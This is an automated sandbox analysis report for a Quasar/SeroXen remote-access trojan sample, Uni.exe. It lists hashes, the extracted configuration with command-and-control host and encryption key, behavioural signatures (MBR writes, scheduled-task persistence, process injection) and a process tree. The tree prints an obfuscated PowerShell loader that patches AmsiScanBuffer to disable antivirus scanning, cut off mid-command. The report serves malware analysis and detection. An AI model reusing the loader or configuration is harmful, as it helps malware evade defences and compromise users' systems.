Analysis
-
max time kernel
116s -
max time network
127s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 16:02
Errors
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
4c2bb0618a6eda615c8001d5a7ccd6c0
-
SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0
-
SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
-
SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
SSDEEP
12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-xPAuDxLNyBmZ7S2WLJ
-
encryption_key
Pw78RUs175dFrKD7lMwH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2968-1-0x0000000000390000-0x00000000003FC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1004 created 624 1004 powershell.EXE winlogon.exe PID 2060 created 624 2060 powershell.EXE winlogon.exe -
Executes dropped EXE 4 IoCs
Processes:
Client.exeinstall.exeinstall.exet0AgLtCPSbAg.exepid process 2076 Client.exe 552 install.exe 3152 install.exe 2288 t0AgLtCPSbAg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 9 raw.githubusercontent.com 5 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
t0AgLtCPSbAg.exedescription ioc process File opened for modification \??\PhysicalDrive0 t0AgLtCPSbAg.exe -
Drops file in System32 directory 6 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1004 set thread context of 1844 1004 powershell.EXE dllhost.exe PID 2060 set thread context of 3564 2060 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 1684 schtasks.exe 756 SCHTASKS.exe 1116 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7133246C-BE95-441E-A4F9-31577D6A28C5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715702733" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exedllhost.exeClient.exepid process 1004 powershell.EXE 1004 powershell.EXE 2060 powershell.EXE 2060 powershell.EXE 1004 powershell.EXE 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 2060 powershell.EXE 1844 dllhost.exe 1844 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 2076 Client.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exepowershell.EXEClient.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2968 Uni.exe Token: SeDebugPrivilege 1004 powershell.EXE Token: SeDebugPrivilege 2076 Client.exe Token: SeDebugPrivilege 2060 powershell.EXE Token: SeDebugPrivilege 1004 powershell.EXE Token: SeDebugPrivilege 1844 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3316 Explorer.EXE 3316 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 3316 Explorer.EXE 3316 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 2076 Client.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
RuntimeBroker.exepid process 3892 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEdllhost.exedescription pid process target process PID 2968 wrote to memory of 1684 2968 Uni.exe schtasks.exe PID 2968 wrote to memory of 1684 2968 Uni.exe schtasks.exe PID 2968 wrote to memory of 1684 2968 Uni.exe schtasks.exe PID 2968 wrote to memory of 2076 2968 Uni.exe Client.exe PID 2968 wrote to memory of 2076 2968 Uni.exe Client.exe PID 2968 wrote to memory of 2076 2968 Uni.exe Client.exe PID 2968 wrote to memory of 552 2968 Uni.exe install.exe PID 2968 wrote to memory of 552 2968 Uni.exe install.exe PID 2968 wrote to memory of 552 2968 Uni.exe install.exe PID 2968 wrote to memory of 756 2968 Uni.exe SCHTASKS.exe PID 2968 wrote to memory of 756 2968 Uni.exe SCHTASKS.exe PID 2968 wrote to memory of 756 2968 Uni.exe SCHTASKS.exe PID 2076 wrote to memory of 1116 2076 Client.exe schtasks.exe PID 2076 wrote to memory of 1116 2076 Client.exe schtasks.exe PID 2076 wrote to memory of 1116 2076 Client.exe schtasks.exe PID 2076 wrote to memory of 3152 2076 Client.exe install.exe PID 2076 wrote to memory of 3152 2076 Client.exe install.exe PID 2076 wrote to memory of 3152 2076 Client.exe install.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1004 wrote to memory of 1844 1004 powershell.EXE dllhost.exe PID 1844 wrote to memory of 624 1844 dllhost.exe winlogon.exe PID 1844 wrote to memory of 680 1844 dllhost.exe lsass.exe PID 1844 wrote to memory of 980 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 436 1844 dllhost.exe dwm.exe PID 1844 wrote to memory of 432 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1048 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1064 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1080 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1188 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1196 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1264 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1272 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1356 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1388 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1520 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1612 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1636 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1644 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1728 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1808 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1816 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1872 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1928 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1952 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1088 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1672 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2132 1844 dllhost.exe spoolsv.exe PID 1844 wrote to memory of 2296 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2340 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2464 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2472 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2512 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2592 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2608 1844 dllhost.exe sysmon.exe PID 1844 wrote to memory of 2628 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2640 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 2648 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 3068 1844 dllhost.exe sihost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:436
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{58db0924-2bab-45ec-9fb9-0831147cd9c6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bb0e642d-5387-4d3f-a946-98834e390909}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gWZQifWFQSJY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HXBZalMtsFrLQn,[Parameter(Position=1)][Type]$hCngpmDWJL)$eqsDSVHqdFs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+'od'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+'t'+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$eqsDSVHqdFs.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HXBZalMtsFrLQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$eqsDSVHqdFs.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+','+''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+'l',$hCngpmDWJL,$HXBZalMtsFrLQn).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+'d'+'');Write-Output $eqsDSVHqdFs.CreateType();}$sSXpmGKDqkcdG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'ro'+[Char](115)+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+[Char](101)+'M'+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$WdONwZqliAuNjM=$sSXpmGKDqkcdG.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+''+'r'+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ywuojGpUVJUDNGQrjNZ=gWZQifWFQSJY @([String])([IntPtr]);$MQffEiWUEZmFwEIgNVPpRJ=gWZQifWFQSJY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$imWoTiUEIEq=$sSXpmGKDqkcdG.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+'o'+'d'+'ul'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+'l'+[Char](51)+''+'2'+'.dl'+'l'+'')));$hYtChpYdhtFjcQ=$WdONwZqliAuNjM.Invoke($Null,@([Object]$imWoTiUEIEq,[Object]('L'+[Char](111)+'a'+[Char](100)+'L'+'i'+''+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$PbtnTPXoxPYRHjNnc=$WdONwZqliAuNjM.Invoke($Null,@([Object]$imWoTiUEIEq,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+'c'+[Char](116)+'')));$pxfbWkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hYtChpYdhtFjcQ,$ywuojGpUVJUDNGQrjNZ).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$gxpUVcPkgLFCBYdMf=$WdONwZqliAuNjM.Invoke($Null,@([Object]$pxfbWkl,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+'an'+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$EXJJCSpYOv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbtnTPXoxPYRHjNnc,$MQffEiWUEZmFwEIgNVPpRJ).Invoke($gxpUVcPkgLFCBYdMf,[uint32]8,4,[ref]$EXJJCSpYOv);[Runtime.InteropSer